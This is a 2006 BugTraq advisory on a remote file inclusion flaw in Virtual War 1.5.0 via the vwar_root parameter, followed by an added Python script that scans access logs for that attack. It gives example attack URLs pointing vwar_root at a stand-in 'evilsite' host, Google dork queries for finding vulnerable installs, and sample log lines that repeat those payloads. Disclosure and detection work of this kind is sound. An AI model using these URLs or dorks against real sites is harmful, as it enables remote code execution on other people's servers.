BugTraq
Virtual War File Inclusion
Apr 08 2006 01:27PM
liz0 bsdmail com
Virtual War File inclusion
---------------------------------
Site:http://www.vwar.de/
Demo:http://www.vwar.de/demo/
---------------------------------------
File Inclusion
// get functions
$vwar_root = "./";
require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");
Vwar_root parameter File inclusion
Aut File
war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,popup.php
and
all admin folder files
---------------------------------------
example
1)
http://victim.com/path/admin/admin.php?vwar_root=http://evilsite
2)(phpnuke module)
http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite
-----------------------------------------
Credit:Liz0ziM
E-mail:liz0 (at) bsdmail (dot) com
Site:www.biyo.tk www.biyosecurity.be
-----------------------------------------
google:
"Powered by: Virtual War v1.5.0"
inurl:"modules.php?name=vwar"
-------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/431925/
http://liz0zim.no-ip.org/vwar.txt
Copyright 2010, SecurityFocus
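Added example, not part of the original post: a Python sketch for defenders that scans web server access logs for requests carrying the vwar_root parameter described above. The combined log format, the sample lines and the rule that any client-supplied vwar_root deserves review are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts with a URL scheme / stream wrapper or a UNC path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*://|data:|\\\\)', re.I)

# Constructed sample lines, modelled on the advisory's two example URLs.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Apr/2006:13:30:01 +0000] "GET /path/admin/admin.php?vwar_root=http://evilsite HTTP/1.1" 200 512',
    '192.0.2.11 - - [08/Apr/2006:13:30:05 +0000] "GET /path/modules/vwar/admin/admin.php?vwar_root=hTtP%3A%2F%2Fevilsite%2F HTTP/1.1" 200 512',
    '192.0.2.12 - - [08/Apr/2006:13:31:00 +0000] "GET /path/war.php?vwar_root=../../tmp/ HTTP/1.1" 200 512',
    '192.0.2.13 - - [08/Apr/2006:13:32:00 +0000] "GET /path/news.php?id=4 HTTP/1.1" 200 2048',
]

def decode(value, rounds=3):
    """Undo nested percent-encoding so that %2568ttp is read as http."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def classify(line, param="vwar_root"):
    """Return None, "override" or "remote" for one access log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    verdict = None
    query = m.group(1).partition("?")[2]
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key != param:
            continue
        if REMOTE_RE.match(decode(value)):
            return "remote"      # include path pointed at another host
        verdict = "override"     # assumption: clients never send this parameter
    return verdict

def scan(lines):
    """Return (client address, verdict) for every flagged line."""
    return [(l.split(" ", 1)[0], v) for l in lines if (v := classify(l))]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

Access logs record only the query string, so a vwar_root value sent in a POST body will not be seen by this check.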